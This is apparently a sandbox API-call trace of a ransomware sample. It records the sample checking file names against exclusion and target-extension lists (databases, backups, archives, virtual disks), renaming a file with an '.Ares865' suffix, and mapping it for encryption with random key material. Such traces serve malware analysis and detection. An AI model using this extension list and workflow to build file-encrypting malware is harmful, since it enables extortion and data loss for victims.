[0084.777] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp") returned 82 [0084.777] lstrcpyW (in: lpString1=0x2cce488, lpString2="usertile17.bmp" | out: lpString1="usertile17.bmp") returned="usertile17.bmp" [0084.777] lstrlenW (lpString="usertile17.bmp") returned 14 [0084.777] lstrlenW (lpString="Ares865") returned 7 [0084.777] lstrcmpiW (lpString1="e17.bmp", lpString2="Ares865") returned 1 [0084.777] lstrlenW (lpString=".dll") returned 4 [0084.777] lstrcmpiW (lpString1="usertile17.bmp", lpString2=".dll") returned 1 [0084.777] lstrlenW (lpString=".lnk") returned 4 [0084.777] lstrcmpiW (lpString1="usertile17.bmp", lpString2=".lnk") returned 1 [0084.777] lstrlenW (lpString=".ini") returned 4 [0084.777] lstrcmpiW (lpString1="usertile17.bmp", lpString2=".ini") returned 1 [0084.777] lstrlenW (lpString=".sys") returned 4 [0084.777] lstrcmpiW (lpString1="usertile17.bmp", lpString2=".sys") returned 1 [0084.777] lstrlenW (lpString="usertile17.bmp") returned 14 [0084.777] lstrlenW (lpString="bak") returned 3 [0084.777] lstrcmpiW (lpString1="bmp", lpString2="bak") returned 1 [0084.777] lstrlenW (lpString="ba_") returned 3 [0084.777] lstrcmpiW (lpString1="bmp", lpString2="ba_") returned 1 [0084.777] lstrlenW (lpString="dbb") returned 3 [0084.777] lstrcmpiW (lpString1="bmp", lpString2="dbb") returned -1 [0084.777] lstrlenW (lpString="vmdk") returned 4 [0084.777] lstrcmpiW (lpString1=".bmp", lpString2="vmdk") returned -1 [0084.777] lstrlenW (lpString="rar") returned 3 [0084.778] lstrcmpiW (lpString1="bmp", lpString2="rar") returned -1 [0084.778] lstrlenW (lpString="zip") returned 3 [0084.778] lstrcmpiW (lpString1="bmp", lpString2="zip") returned -1 [0084.778] lstrlenW (lpString="tgz") returned 3 [0084.778] lstrcmpiW (lpString1="bmp", lpString2="tgz") returned -1 [0084.778] lstrlenW (lpString="vbox") returned 4 [0084.778] lstrcmpiW (lpString1=".bmp", lpString2="vbox") returned -1 [0084.778] lstrlenW (lpString="vdi") returned 3 [0084.778] lstrcmpiW (lpString1="bmp", lpString2="vdi") returned -1 [0084.778] lstrlenW (lpString="vhd") returned 3 [0084.778] lstrcmpiW (lpString1="bmp", lpString2="vhd") returned -1 [0084.778] lstrlenW (lpString="vhdx") returned 4 [0084.778] lstrcmpiW (lpString1=".bmp", lpString2="vhdx") returned -1 [0084.778] lstrlenW (lpString="avhd") returned 4 [0084.778] lstrcmpiW (lpString1=".bmp", lpString2="avhd") returned -1 [0084.778] lstrlenW (lpString="db") returned 2 [0084.778] lstrcmpiW (lpString1="mp", lpString2="db") returned 1 [0084.778] lstrlenW (lpString="db2") returned 3 [0084.778] lstrcmpiW (lpString1="bmp", lpString2="db2") returned -1 [0084.778] lstrlenW (lpString="db3") returned 3 [0084.778] lstrcmpiW (lpString1="bmp", lpString2="db3") returned -1 [0084.778] lstrlenW (lpString="dbf") returned 3 [0084.778] lstrcmpiW (lpString1="bmp", lpString2="dbf") returned -1 [0084.778] lstrlenW (lpString="mdf") returned 3 [0084.778] lstrcmpiW (lpString1="bmp", lpString2="mdf") returned -1 [0084.778] lstrlenW (lpString="mdb") returned 3 [0084.778] lstrcmpiW (lpString1="bmp", lpString2="mdb") returned -1 [0084.778] lstrlenW (lpString="sql") returned 3 [0084.778] lstrcmpiW (lpString1="bmp", lpString2="sql") returned -1 [0084.778] lstrlenW (lpString="sqlite") returned 6 [0084.778] lstrcmpiW (lpString1="17.bmp", lpString2="sqlite") returned -1 [0084.778] lstrlenW (lpString="sqlite3") returned 7 [0084.778] lstrcmpiW (lpString1="e17.bmp", lpString2="sqlite3") returned -1 [0084.778] lstrlenW (lpString="sqlitedb") returned 8 [0084.778] lstrcmpiW (lpString1="le17.bmp", lpString2="sqlitedb") returned -1 [0084.778] lstrlenW (lpString="xml") returned 3 [0084.778] lstrcmpiW (lpString1="bmp", lpString2="xml") returned -1 [0084.779] lstrlenW (lpString="$er") returned 3 [0084.779] lstrcmpiW (lpString1="bmp", lpString2="$er") returned 1 [0084.779] lstrlenW (lpString="4dd") returned 3 [0084.779] lstrcmpiW (lpString1="bmp", lpString2="4dd") returned 1 [0084.779] lstrlenW (lpString="4dl") returned 3 [0084.779] lstrcmpiW (lpString1="bmp", lpString2="4dl") returned 1 [0084.779] lstrlenW (lpString="^^^") returned 3 [0084.779] lstrcmpiW (lpString1="bmp", lpString2="^^^") returned 1 [0084.779] lstrlenW (lpString="abs") returned 3 [0084.779] lstrcmpiW (lpString1="bmp", lpString2="abs") returned 1 [0084.779] lstrlenW (lpString="abx") returned 3 [0084.779] lstrcmpiW (lpString1="bmp", lpString2="abx") returned 1 [0084.779] lstrlenW (lpString="accdb") returned 5 [0084.779] lstrcmpiW (lpString1="7.bmp", lpString2="accdb") returned -1 [0084.779] lstrlenW (lpString="accdc") returned 5 [0084.779] lstrcmpiW (lpString1="7.bmp", lpString2="accdc") returned -1 [0084.779] lstrlenW (lpString="accde") returned 5 [0084.779] lstrcmpiW (lpString1="7.bmp", lpString2="accde") returned -1 [0084.779] lstrlenW (lpString="accdr") returned 5 [0084.779] lstrcmpiW (lpString1="7.bmp", lpString2="accdr") returned -1 [0084.779] lstrlenW (lpString="accdt") returned 5 [0084.779] lstrcmpiW (lpString1="7.bmp", lpString2="accdt") returned -1 [0084.779] lstrlenW (lpString="accdw") returned 5 [0084.779] lstrcmpiW (lpString1="7.bmp", lpString2="accdw") returned -1 [0084.779] lstrlenW (lpString="accft") returned 5 [0084.779] lstrcmpiW (lpString1="7.bmp", lpString2="accft") returned -1 [0084.779] lstrlenW (lpString="adb") returned 3 [0084.779] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0084.779] lstrlenW (lpString="adb") returned 3 [0084.779] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0084.779] lstrlenW (lpString="ade") returned 3 [0084.779] lstrcmpiW (lpString1="bmp", lpString2="ade") returned 1 [0084.779] lstrlenW (lpString="adf") returned 3 [0084.779] lstrcmpiW (lpString1="bmp", lpString2="adf") returned 1 [0084.779] lstrlenW (lpString="adn") returned 3 [0084.779] lstrcmpiW (lpString1="bmp", lpString2="adn") returned 1 [0084.779] lstrlenW (lpString="adp") returned 3 [0084.779] lstrcmpiW (lpString1="bmp", lpString2="adp") returned 1 [0084.780] lstrlenW (lpString="alf") returned 3 [0084.780] lstrcmpiW (lpString1="bmp", lpString2="alf") returned 1 [0084.780] lstrlenW (lpString="ask") returned 3 [0084.780] lstrcmpiW (lpString1="bmp", lpString2="ask") returned 1 [0084.780] lstrlenW (lpString="btr") returned 3 [0084.780] lstrcmpiW (lpString1="bmp", lpString2="btr") returned -1 [0084.780] lstrlenW (lpString="cat") returned 3 [0084.780] lstrcmpiW (lpString1="bmp", lpString2="cat") returned -1 [0084.780] lstrlenW (lpString="cdb") returned 3 [0084.780] lstrcmpiW (lpString1="bmp", lpString2="cdb") returned -1 [0084.780] lstrlenW (lpString="ckp") returned 3 [0084.780] lstrcmpiW (lpString1="bmp", lpString2="ckp") returned -1 [0084.780] lstrlenW (lpString="cma") returned 3 [0084.780] lstrcmpiW (lpString1="bmp", lpString2="cma") returned -1 [0084.780] lstrlenW (lpString="cpd") returned 3 [0084.780] lstrcmpiW (lpString1="bmp", lpString2="cpd") returned -1 [0084.780] lstrlenW (lpString="dacpac") returned 6 [0084.780] lstrcmpiW (lpString1="17.bmp", lpString2="dacpac") returned -1 [0084.780] lstrlenW (lpString="dad") returned 3 [0084.780] lstrcmpiW (lpString1="bmp", lpString2="dad") returned -1 [0084.780] lstrlenW (lpString="dadiagrams") returned 10 [0084.780] lstrcmpiW (lpString1="tile17.bmp", lpString2="dadiagrams") returned 1 [0084.780] lstrlenW (lpString="daschema") returned 8 [0084.780] lstrcmpiW (lpString1="le17.bmp", lpString2="daschema") returned 1 [0084.780] lstrlenW (lpString="db-journal") returned 10 [0084.780] lstrcmpiW (lpString1="tile17.bmp", lpString2="db-journal") returned 1 [0084.780] lstrlenW (lpString="db-shm") returned 6 [0084.780] lstrcmpiW (lpString1="17.bmp", lpString2="db-shm") returned -1 [0084.780] lstrlenW (lpString="db-wal") returned 6 [0084.780] lstrcmpiW (lpString1="17.bmp", lpString2="db-wal") returned -1 [0084.780] lstrlenW (lpString="dbc") returned 3 [0084.780] lstrcmpiW (lpString1="bmp", lpString2="dbc") returned -1 [0084.780] lstrlenW (lpString="dbs") returned 3 [0084.780] lstrcmpiW (lpString1="bmp", lpString2="dbs") returned -1 [0084.780] lstrlenW (lpString="dbt") returned 3 [0084.780] lstrcmpiW (lpString1="bmp", lpString2="dbt") returned -1 [0084.781] lstrlenW (lpString="dbv") returned 3 [0084.781] lstrcmpiW (lpString1="bmp", lpString2="dbv") returned -1 [0084.781] lstrlenW (lpString="dbx") returned 3 [0084.781] lstrcmpiW (lpString1="bmp", lpString2="dbx") returned -1 [0084.781] lstrlenW (lpString="dcb") returned 3 [0084.781] lstrcmpiW (lpString1="bmp", lpString2="dcb") returned -1 [0084.781] lstrlenW (lpString="dct") returned 3 [0084.781] lstrcmpiW (lpString1="bmp", lpString2="dct") returned -1 [0084.781] lstrlenW (lpString="dcx") returned 3 [0084.781] lstrcmpiW (lpString1="bmp", lpString2="dcx") returned -1 [0084.781] lstrlenW (lpString="ddl") returned 3 [0084.781] lstrcmpiW (lpString1="bmp", lpString2="ddl") returned -1 [0084.781] lstrlenW (lpString="dlis") returned 4 [0084.781] lstrcmpiW (lpString1=".bmp", lpString2="dlis") returned -1 [0084.781] lstrlenW (lpString="dp1") returned 3 [0084.781] lstrcmpiW (lpString1="bmp", lpString2="dp1") returned -1 [0084.781] lstrlenW (lpString="dqy") returned 3 [0084.781] lstrcmpiW (lpString1="bmp", lpString2="dqy") returned -1 [0084.781] lstrlenW (lpString="dsk") returned 3 [0084.781] lstrcmpiW (lpString1="bmp", lpString2="dsk") returned -1 [0084.781] lstrlenW (lpString="dsn") returned 3 [0084.781] lstrcmpiW (lpString1="bmp", lpString2="dsn") returned -1 [0084.781] lstrlenW (lpString="dtsx") returned 4 [0084.781] lstrcmpiW (lpString1=".bmp", lpString2="dtsx") returned -1 [0084.781] lstrlenW (lpString="dxl") returned 3 [0084.781] lstrcmpiW (lpString1="bmp", lpString2="dxl") returned -1 [0084.781] lstrlenW (lpString="eco") returned 3 [0084.781] lstrcmpiW (lpString1="bmp", lpString2="eco") returned -1 [0084.781] lstrlenW (lpString="ecx") returned 3 [0084.781] lstrcmpiW (lpString1="bmp", lpString2="ecx") returned -1 [0084.781] lstrlenW (lpString="edb") returned 3 [0084.781] lstrcmpiW (lpString1="bmp", lpString2="edb") returned -1 [0084.781] lstrlenW (lpString="epim") returned 4 [0084.781] lstrcmpiW (lpString1=".bmp", lpString2="epim") returned -1 [0084.781] lstrlenW (lpString="fcd") returned 3 [0084.781] lstrcmpiW (lpString1="bmp", lpString2="fcd") returned -1 [0084.782] lstrlenW (lpString="fdb") returned 3 [0084.782] lstrcmpiW (lpString1="bmp", lpString2="fdb") returned -1 [0084.782] lstrlenW (lpString="fic") returned 3 [0084.782] lstrcmpiW (lpString1="bmp", lpString2="fic") returned -1 [0084.782] lstrlenW (lpString="flexolibrary") returned 12 [0084.782] lstrcmpiW (lpString1="ertile17.bmp", lpString2="flexolibrary") returned -1 [0084.782] lstrlenW (lpString="fm5") returned 3 [0084.782] lstrcmpiW (lpString1="bmp", lpString2="fm5") returned -1 [0084.782] lstrlenW (lpString="fmp") returned 3 [0084.782] lstrcmpiW (lpString1="bmp", lpString2="fmp") returned -1 [0084.782] lstrlenW (lpString="fmp12") returned 5 [0084.782] lstrcmpiW (lpString1="7.bmp", lpString2="fmp12") returned -1 [0084.782] lstrlenW (lpString="fmpsl") returned 5 [0084.782] lstrcmpiW (lpString1="7.bmp", lpString2="fmpsl") returned -1 [0084.782] lstrlenW (lpString="fol") returned 3 [0084.782] lstrcmpiW (lpString1="bmp", lpString2="fol") returned -1 [0084.782] lstrlenW (lpString="fp3") returned 3 [0084.782] lstrcmpiW (lpString1="bmp", lpString2="fp3") returned -1 [0084.782] lstrlenW (lpString="fp4") returned 3 [0084.782] lstrcmpiW (lpString1="bmp", lpString2="fp4") returned -1 [0084.782] lstrlenW (lpString="fp5") returned 3 [0084.782] lstrcmpiW (lpString1="bmp", lpString2="fp5") returned -1 [0084.782] lstrlenW (lpString="fp7") returned 3 [0084.782] lstrcmpiW (lpString1="bmp", lpString2="fp7") returned -1 [0084.782] lstrlenW (lpString="fpt") returned 3 [0084.782] lstrcmpiW (lpString1="bmp", lpString2="fpt") returned -1 [0084.782] lstrlenW (lpString="frm") returned 3 [0084.782] lstrcmpiW (lpString1="bmp", lpString2="frm") returned -1 [0084.782] lstrlenW (lpString="gdb") returned 3 [0084.782] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0084.782] lstrlenW (lpString="gdb") returned 3 [0084.782] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0084.782] lstrlenW (lpString="grdb") returned 4 [0084.782] lstrcmpiW (lpString1=".bmp", lpString2="grdb") returned -1 [0084.782] lstrlenW (lpString="gwi") returned 3 [0084.782] lstrcmpiW (lpString1="bmp", lpString2="gwi") returned -1 [0084.783] lstrlenW (lpString="hdb") returned 3 [0084.783] lstrcmpiW (lpString1="bmp", lpString2="hdb") returned -1 [0084.783] lstrlenW (lpString="his") returned 3 [0084.783] lstrcmpiW (lpString1="bmp", lpString2="his") returned -1 [0084.783] lstrlenW (lpString="ib") returned 2 [0084.783] lstrcmpiW (lpString1="mp", lpString2="ib") returned 1 [0084.783] lstrlenW (lpString="idb") returned 3 [0084.783] lstrcmpiW (lpString1="bmp", lpString2="idb") returned -1 [0084.783] lstrlenW (lpString="ihx") returned 3 [0084.783] lstrcmpiW (lpString1="bmp", lpString2="ihx") returned -1 [0084.783] lstrlenW (lpString="itdb") returned 4 [0084.783] lstrcmpiW (lpString1=".bmp", lpString2="itdb") returned -1 [0084.783] lstrlenW (lpString="itw") returned 3 [0084.783] lstrcmpiW (lpString1="bmp", lpString2="itw") returned -1 [0084.783] lstrlenW (lpString="jet") returned 3 [0084.783] lstrcmpiW (lpString1="bmp", lpString2="jet") returned -1 [0084.783] lstrlenW (lpString="jtx") returned 3 [0084.783] lstrcmpiW (lpString1="bmp", lpString2="jtx") returned -1 [0084.783] lstrlenW (lpString="kdb") returned 3 [0084.783] lstrcmpiW (lpString1="bmp", lpString2="kdb") returned -1 [0084.783] lstrlenW (lpString="kexi") returned 4 [0084.783] lstrcmpiW (lpString1=".bmp", lpString2="kexi") returned -1 [0084.783] lstrlenW (lpString="kexic") returned 5 [0084.783] lstrcmpiW (lpString1="7.bmp", lpString2="kexic") returned -1 [0084.783] lstrlenW (lpString="kexis") returned 5 [0084.783] lstrcmpiW (lpString1="7.bmp", lpString2="kexis") returned -1 [0084.783] lstrlenW (lpString="lgc") returned 3 [0084.783] lstrcmpiW (lpString1="bmp", lpString2="lgc") returned -1 [0084.783] lstrlenW (lpString="lwx") returned 3 [0084.783] lstrcmpiW (lpString1="bmp", lpString2="lwx") returned -1 [0084.783] lstrlenW (lpString="maf") returned 3 [0084.783] lstrcmpiW (lpString1="bmp", lpString2="maf") returned -1 [0084.783] lstrlenW (lpString="maq") returned 3 [0084.783] lstrcmpiW (lpString1="bmp", lpString2="maq") returned -1 [0084.783] lstrlenW (lpString="mar") returned 3 [0084.783] lstrcmpiW (lpString1="bmp", lpString2="mar") returned -1 [0084.783] lstrlenW (lpString="marshal") returned 7 [0084.783] lstrcmpiW (lpString1="e17.bmp", lpString2="marshal") returned -1 [0084.783] lstrlenW (lpString="mas") returned 3 [0084.784] lstrcmpiW (lpString1="bmp", lpString2="mas") returned -1 [0084.784] lstrlenW (lpString="mav") returned 3 [0084.784] lstrcmpiW (lpString1="bmp", lpString2="mav") returned -1 [0084.784] lstrlenW (lpString="maw") returned 3 [0084.784] lstrcmpiW (lpString1="bmp", lpString2="maw") returned -1 [0084.784] lstrlenW (lpString="mdbhtml") returned 7 [0084.784] lstrcmpiW (lpString1="e17.bmp", lpString2="mdbhtml") returned -1 [0084.784] lstrlenW (lpString="mdn") returned 3 [0084.784] lstrcmpiW (lpString1="bmp", lpString2="mdn") returned -1 [0084.784] lstrlenW (lpString="mdt") returned 3 [0084.784] lstrcmpiW (lpString1="bmp", lpString2="mdt") returned -1 [0084.784] lstrlenW (lpString="mfd") returned 3 [0084.784] lstrcmpiW (lpString1="bmp", lpString2="mfd") returned -1 [0084.784] lstrlenW (lpString="mpd") returned 3 [0084.784] lstrcmpiW (lpString1="bmp", lpString2="mpd") returned -1 [0084.784] lstrlenW (lpString="mrg") returned 3 [0084.784] lstrcmpiW (lpString1="bmp", lpString2="mrg") returned -1 [0084.784] lstrlenW (lpString="mud") returned 3 [0084.784] lstrcmpiW (lpString1="bmp", lpString2="mud") returned -1 [0084.784] lstrlenW (lpString="mwb") returned 3 [0084.784] lstrcmpiW (lpString1="bmp", lpString2="mwb") returned -1 [0084.784] lstrlenW (lpString="myd") returned 3 [0084.784] lstrcmpiW (lpString1="bmp", lpString2="myd") returned -1 [0084.784] lstrlenW (lpString="ndf") returned 3 [0084.784] lstrcmpiW (lpString1="bmp", lpString2="ndf") returned -1 [0084.784] lstrlenW (lpString="nnt") returned 3 [0084.784] lstrcmpiW (lpString1="bmp", lpString2="nnt") returned -1 [0084.784] lstrlenW (lpString="nrmlib") returned 6 [0084.784] lstrcmpiW (lpString1="17.bmp", lpString2="nrmlib") returned -1 [0084.784] lstrlenW (lpString="ns2") returned 3 [0084.784] lstrcmpiW (lpString1="bmp", lpString2="ns2") returned -1 [0084.784] lstrlenW (lpString="ns3") returned 3 [0084.784] lstrcmpiW (lpString1="bmp", lpString2="ns3") returned -1 [0084.784] lstrlenW (lpString="ns4") returned 3 [0084.784] lstrcmpiW (lpString1="bmp", lpString2="ns4") returned -1 [0084.784] lstrlenW (lpString="nsf") returned 3 [0084.784] lstrcmpiW (lpString1="bmp", lpString2="nsf") returned -1 [0084.784] lstrlenW (lpString="nv") returned 2 [0084.785] lstrcmpiW (lpString1="mp", lpString2="nv") returned -1 [0084.785] lstrlenW (lpString="nv2") returned 3 [0084.785] lstrcmpiW (lpString1="bmp", lpString2="nv2") returned -1 [0084.785] lstrlenW (lpString="nwdb") returned 4 [0084.785] lstrcmpiW (lpString1=".bmp", lpString2="nwdb") returned -1 [0084.785] lstrlenW (lpString="nyf") returned 3 [0084.785] lstrcmpiW (lpString1="bmp", lpString2="nyf") returned -1 [0084.785] lstrlenW (lpString="odb") returned 3 [0084.785] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0084.785] lstrlenW (lpString="odb") returned 3 [0084.785] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0084.785] lstrlenW (lpString="oqy") returned 3 [0084.785] lstrcmpiW (lpString1="bmp", lpString2="oqy") returned -1 [0084.785] lstrlenW (lpString="ora") returned 3 [0084.785] lstrcmpiW (lpString1="bmp", lpString2="ora") returned -1 [0084.785] lstrlenW (lpString="orx") returned 3 [0084.785] lstrcmpiW (lpString1="bmp", lpString2="orx") returned -1 [0084.785] lstrlenW (lpString="owc") returned 3 [0084.785] lstrcmpiW (lpString1="bmp", lpString2="owc") returned -1 [0084.785] lstrlenW (lpString="p96") returned 3 [0084.785] lstrcmpiW (lpString1="bmp", lpString2="p96") returned -1 [0084.785] lstrlenW (lpString="p97") returned 3 [0084.785] lstrcmpiW (lpString1="bmp", lpString2="p97") returned -1 [0084.785] lstrlenW (lpString="pan") returned 3 [0084.785] lstrcmpiW (lpString1="bmp", lpString2="pan") returned -1 [0084.785] lstrlenW (lpString="pdb") returned 3 [0084.785] lstrcmpiW (lpString1="bmp", lpString2="pdb") returned -1 [0084.785] lstrlenW (lpString="pdm") returned 3 [0084.785] lstrcmpiW (lpString1="bmp", lpString2="pdm") returned -1 [0084.785] lstrlenW (lpString="pnz") returned 3 [0084.785] lstrcmpiW (lpString1="bmp", lpString2="pnz") returned -1 [0084.785] lstrlenW (lpString="qry") returned 3 [0084.785] lstrcmpiW (lpString1="bmp", lpString2="qry") returned -1 [0084.785] lstrlenW (lpString="qvd") returned 3 [0084.785] lstrcmpiW (lpString1="bmp", lpString2="qvd") returned -1 [0084.785] lstrlenW (lpString="rbf") returned 3 [0084.785] lstrcmpiW (lpString1="bmp", lpString2="rbf") returned -1 [0084.785] lstrlenW (lpString="rctd") returned 4 [0084.786] lstrcmpiW (lpString1=".bmp", lpString2="rctd") returned -1 [0084.786] lstrlenW (lpString="rod") returned 3 [0084.786] lstrcmpiW (lpString1="bmp", lpString2="rod") returned -1 [0084.786] lstrlenW (lpString="rodx") returned 4 [0084.786] lstrcmpiW (lpString1=".bmp", lpString2="rodx") returned -1 [0084.786] lstrlenW (lpString="rpd") returned 3 [0084.786] lstrcmpiW (lpString1="bmp", lpString2="rpd") returned -1 [0084.786] lstrlenW (lpString="rsd") returned 3 [0084.786] lstrcmpiW (lpString1="bmp", lpString2="rsd") returned -1 [0084.786] lstrlenW (lpString="sas7bdat") returned 8 [0084.786] lstrcmpiW (lpString1="le17.bmp", lpString2="sas7bdat") returned -1 [0084.786] lstrlenW (lpString="sbf") returned 3 [0084.786] lstrcmpiW (lpString1="bmp", lpString2="sbf") returned -1 [0084.786] lstrlenW (lpString="scx") returned 3 [0084.786] lstrcmpiW (lpString1="bmp", lpString2="scx") returned -1 [0084.786] lstrlenW (lpString="sdb") returned 3 [0084.786] lstrcmpiW (lpString1="bmp", lpString2="sdb") returned -1 [0084.786] lstrlenW (lpString="sdc") returned 3 [0084.786] lstrcmpiW (lpString1="bmp", lpString2="sdc") returned -1 [0084.786] lstrlenW (lpString="sdf") returned 3 [0084.786] lstrcmpiW (lpString1="bmp", lpString2="sdf") returned -1 [0084.786] lstrlenW (lpString="sis") returned 3 [0084.786] lstrcmpiW (lpString1="bmp", lpString2="sis") returned -1 [0084.786] lstrlenW (lpString="spq") returned 3 [0084.786] lstrcmpiW (lpString1="bmp", lpString2="spq") returned -1 [0084.786] lstrlenW (lpString="te") returned 2 [0084.786] lstrcmpiW (lpString1="mp", lpString2="te") returned -1 [0084.786] lstrlenW (lpString="teacher") returned 7 [0084.786] lstrcmpiW (lpString1="e17.bmp", lpString2="teacher") returned -1 [0084.786] lstrlenW (lpString="tmd") returned 3 [0084.786] lstrcmpiW (lpString1="bmp", lpString2="tmd") returned -1 [0084.786] lstrlenW (lpString="tps") returned 3 [0084.786] lstrcmpiW (lpString1="bmp", lpString2="tps") returned -1 [0084.786] lstrlenW (lpString="trc") returned 3 [0084.786] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0084.786] lstrlenW (lpString="trc") returned 3 [0084.787] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0084.787] lstrlenW (lpString="trm") returned 3 [0084.787] lstrcmpiW (lpString1="bmp", lpString2="trm") returned -1 [0084.787] lstrlenW (lpString="udb") returned 3 [0084.787] lstrcmpiW (lpString1="bmp", lpString2="udb") returned -1 [0084.787] lstrlenW (lpString="udl") returned 3 [0084.787] lstrcmpiW (lpString1="bmp", lpString2="udl") returned -1 [0084.787] lstrlenW (lpString="usr") returned 3 [0084.787] lstrcmpiW (lpString1="bmp", lpString2="usr") returned -1 [0084.787] lstrlenW (lpString="v12") returned 3 [0084.787] lstrcmpiW (lpString1="bmp", lpString2="v12") returned -1 [0084.787] lstrlenW (lpString="vis") returned 3 [0084.787] lstrcmpiW (lpString1="bmp", lpString2="vis") returned -1 [0084.787] lstrlenW (lpString="vpd") returned 3 [0084.787] lstrcmpiW (lpString1="bmp", lpString2="vpd") returned -1 [0084.787] lstrlenW (lpString="vvv") returned 3 [0084.787] lstrcmpiW (lpString1="bmp", lpString2="vvv") returned -1 [0084.787] lstrlenW (lpString="wdb") returned 3 [0084.787] lstrcmpiW (lpString1="bmp", lpString2="wdb") returned -1 [0084.787] lstrlenW (lpString="wmdb") returned 4 [0084.787] lstrcmpiW (lpString1=".bmp", lpString2="wmdb") returned -1 [0084.787] lstrlenW (lpString="wrk") returned 3 [0084.787] lstrcmpiW (lpString1="bmp", lpString2="wrk") returned -1 [0084.787] lstrlenW (lpString="xdb") returned 3 [0084.787] lstrcmpiW (lpString1="bmp", lpString2="xdb") returned -1 [0084.787] lstrlenW (lpString="xld") returned 3 [0084.787] lstrcmpiW (lpString1="bmp", lpString2="xld") returned -1 [0084.787] lstrlenW (lpString="xmlff") returned 5 [0084.787] lstrcmpiW (lpString1="7.bmp", lpString2="xmlff") returned -1 [0084.787] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp.Ares865") returned 90 [0084.787] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile17.bmp"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile17.bmp.ares865"), dwFlags=0x1) returned 1 [0084.788] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile17.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0084.788] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49208) returned 1 [0084.789] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0084.789] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0084.789] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0084.789] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0084.790] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0084.790] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0084.790] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc340, lpName=0x0) returned 0x15c [0084.792] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc340) returned 0x190000 [0084.795] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0084.796] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0084.796] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0084.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0084.796] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0084.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0084.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0084.796] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0084.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0084.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0084.796] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0084.796] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0084.796] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0084.796] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0084.797] CloseHandle (hObject=0x15c) returned 1 [0084.797] CloseHandle (hObject=0x118) returned 1 [0084.797] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0084.797] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0084.797] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0084.797] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae333ca2, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae333ca2, ftLastAccessTime.dwHighDateTime=0x1ca040d, 